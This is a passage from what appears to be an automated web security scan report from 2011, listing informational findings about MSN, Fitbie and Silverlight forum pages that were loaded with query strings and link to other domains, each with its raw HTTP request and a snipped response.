Set-Cookie: MC1=V=3&GUID=b23d5b2d8868446290c3a8adda5bf228; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:47:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   MSN Entert
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/e9613.css" rev="stylesheet" type="text/css"/>
<style>
...[SNIP]...
</style>
<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><link href="http://entcss.s-msn.com/i/video/ent/v5/css/custom_0047.css" rel="stylesheet" type="text/css" >
<link href="http://blstc.msn.com/br/chan/css/1/cntwmodule.css" rel="stylesheet" type="text/css" />
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home" rel="">Careers &amp; Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps &amp; Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections &amp; Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=a25">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406051&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fentertainment.redacted%2Fvideo%2F%3Ffrom%3Den-us_msnhp&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fentertainment.redacted%2fvideo%2f%3ffrom%3den-us_msnhp%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.redacted"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...
<td valign="top"><SCRIPT type=text/javascript src="http://img1.video.s-redacted/v/js/MsnVideoUx_Min.js"></SCRIPT>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

22.80. http://entertainment.redacted/video/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://entertainment.msn.com
Path:   /video/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /video/?from=en-us_msnhp HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 26764
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=37b684207d7f4909a4bd8feb4ef9d03d; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   MSN Entert
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/e9613.css" rev="stylesheet" type="text/css"/>
<style>
...[SNIP]...
</style>
<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><link href="http://entcss.s-msn.com/i/video/ent/v5/css/custom_0047.css" rel="stylesheet" type="text/css" >
<link href="http://blstc.msn.com/br/chan/css/1/cntwmodule.css" rel="stylesheet" type="text/css" />
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home" rel="">Careers &amp; Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps &amp; Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections &amp; Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=a25">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344772&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fentertainment.redacted%2Fvideo%2F%3Ffrom%3Den-us_msnhp&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fentertainment.redacted%2fvideo%2f%3ffrom%3den-us_msnhp%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.redacted"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...
<td valign="top"><SCRIPT type=text/javascript src="http://img1.video.s-redacted/v/js/MsnVideoUx_Min.js"></SCRIPT>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

22.81. http://fitbie.redacted/eat-right/tips/stock-your-refrigerator-weight-loss

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.redacted
Path:   /eat-right/tips/stock-your-refrigerator-weight-loss

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002 HTTP/1.1
Host: fitbie.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1296335106-1"
Last-Modified: Sat, 29 Jan 2011 21:05:06 +0000
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=33530
Expires: Sun, 30 Jan 2011 09:05:15 GMT
Date: Sat, 29 Jan 2011 23:46:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<div><img src="http://msnportalfitlife.112.2O7.net/b/ss/msnportalfitlife/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3">
<a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=A8">Bing</a></span><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div>
   <a target="_blank" href="http://www.400caloriefix.com/fl/?keycode=152106" tabindex="8" class="promo"><img src="http://images.rodale.com/dca/400Cal-navButton.gif" alt="" border="0" width="80" height="31" /></a>
...[SNIP]...
<div class="shop-fitlife"><a href="https://shop.fitbie.com" title="shop fitbie" target="_blank"><img src="/sites/all/themes/fitlife/images/shop_fitbie.gif" alt="shop fitbie" />
...[SNIP]...
<div class="free-trial">
<a href="http://www.walkoffweightbook.com/fl/?keycode=142336&amp;cm_mmc=BeFit.com-_-Module-_-Homepage-_-Walk%20Off%20Weight%20Book" target="_blank" title="ad">Get a Free Trial &gt;</a>
<a href="http://www.walkoffweightbook.com/fl/?keycode=142336&amp;cm_mmc=BeFit.com-_-Module-_-Homepage-_-Walk%20Off%20Weight%20Book" target="_blank" title="ad"><img src="/sites/all/themes/fitlife/images/small_ad_img.png" alt="ad" />
...[SNIP]...
<li class="img"><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title=""><img src="/sites/default/files/2015348_043341_pb_cvc_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title=""><img src="/sites/default/files/2015348_wowmp3_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title=""><img src="/sites/default/files/400calfix.gif" alt="" />
...[SNIP]...
<li><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title="">Learn more</a>
...[SNIP]...
<li class="img"><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title=""><img src="/sites/default/files/2015384_ridelean_2.gif" alt="" />
...[SNIP]...
<li><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title="">Learn more!</a>
...[SNIP]...
</span>
<a href="http://www.facebook.com/sharer.php?u=/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002" id="fbicon"><img src="/sites/all/themes/fitlife/images/fb_icon.jpg" /></a>
<iframe src="http://www.facebook.com/plugins/like.php?href=http://fitbie.msn.com/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002&amp;layout=button_count&amp;show_faces=false&amp;action=like&amp;colorscheme=light;" scrolling="no" frameborder="0" allowTransparency="true" style="border:none;overflow:hidden;height:25px;max-width:78px;">
</iframe>
...[SNIP]...
</span>
       <a href="http://www.menshealth.com/"> <img src="/sites/all/themes/fitlife/images/brandlogos/menshealth.png" alt="menshealth" />
...[SNIP]...
<p><a href="http://eatthis.menshealth.com/slideshow/6-rules-good-nutrition?cm_mmc=Fit_Life-_-Stock%20your%20refrigerator%20for%20weight%20loss-_-Slideshow-_-6%20Rules%20of%20good%20nutrition" target="_blank">Learn 6 rules of good nutrition</a>
...[SNIP]...
</em> <a href="https://shop.fitbie.com/the-lean-belly-prescription.html?keycode=149552">The Lean Belly Prescription</a>
...[SNIP]...
<li class="more-from-link">
<a href="http://www.menshealth.com/mhlists/cut_dietary_fat/index.php?cm_mmc=Fit_Life-_-Stock%20Your%20Regfrigerator%20For%20Weight%20Loss-_-Article-_-8%20Ways%20to%20Cut%20Fat%20Without%20Realizing%20It%20RL" target="_new" title="8 Painless Ways to Cut the Fat">8 Painless Ways to Cut the Fat</a>
...[SNIP]...
<li class="more-from-link">
<a href="http://www.menshealth.com/mhlists/diet_strategies/index.php?cm_mmc=Fit_Life-_-Stock%20Your%20Refrigerator%20For%20Weight%20Loss-_-Article-_-Outwit%20The%20Leading%20Weight%20Loss%20Traps%20For%20Guys%20RL" target="_new" title="6 Worst Weight Loss Traps for Guys">6 Worst Weight Loss Traps for Guys</a>
...[SNIP]...
<li class="more-from-link">
<a href="http://www.menshealth.com/mhlists/healthier_foods/index.php?cm_mmc=Fit_Life-_-Stock%20Your%20Refrigerator%20For%20Weight%20Loss-_-Article-_-10%20Painless%20Way%20To%20Upgrade%20Your%20Diet%20RL" target="_new" title="10 Painless Ways To Upgrade Your Diet">10 Painless Ways To Upgrade Your Diet</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/home?status=http://fitbie.redacted/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002">Twitter</a></li>
<li class="facebook"><a href="http://www.facebook.com/sharer.php?u=http://fitbie.redacted/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002">Facebook</a>
...[SNIP]...
<li class="digg"><a href="http://digg.com/submit?url=http://fitbie.redacted/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002">Digg</a></li>
<li class="share">
       <a class="da2a_button" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffitbie.msn.com%2Feat-right%2Ftips%2Fstock-your-refrigerator-weight-loss&amp;linkname=Stock%20Your%20Refrigerator%20for%20Weight%20Loss%20%7C%20Fitbie" id="da2a_1"> Share</a>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<td>&nbsp;&nbsp;&nbsp;<a target="_blank" href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635"><img src="/sites/all/themes/fitlife/images/facebook-f-icon.png" />
...[SNIP]...
<td>&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="http://twitter.com/Fitbie"><img src="/sites/all/themes/fitlife/images/twitter-t-icon.png" />
...[SNIP]...
<div class="feature-block"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false" target="_blank"><img src="http://images.rodale.com/fitlife/modules/happy-healthy-woman-laughing-th.jpg" alt="Tell Us What You Think About Fitbie!" border="0"/></a><h5>Survey</h5><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false" target="_blank"><h6>
...[SNIP]...
<li><a title="Manage Email Preferences" href="http://preferences.rodale.com/">Manage Email Preferences</a>
...[SNIP]...
<div class="social-media-links clear-block">
<a href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635" title="facebook" class="fb"></a>
<a href="http://twitter.com/Fitbie" title="twitter" class="tweet"></a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.82. http://forums.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=45&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; CommunityServer-LastVisitUpdated-2101=; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:22 GMT
Content-Length: 373


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=45&CampaignID=1857&AdvertiserID=9&BannerID=2627&SiteID=2&RandomNumber=626665759&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/WebUI_300x250_Silverlight.net_Forums.jpg" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

22.83. http://forums.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/user/viewonline.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:12:38 GMT
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=qkzxbljzf02xlo2hgegas05k; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 17:57:35 GMT
Content-Length: 361


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=389&CampaignID=1855&AdvertiserID=129&BannerID=2492&SiteID=2&RandomNumber=253691245&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/W_DevSum11-bann_728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.84. http://forums.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
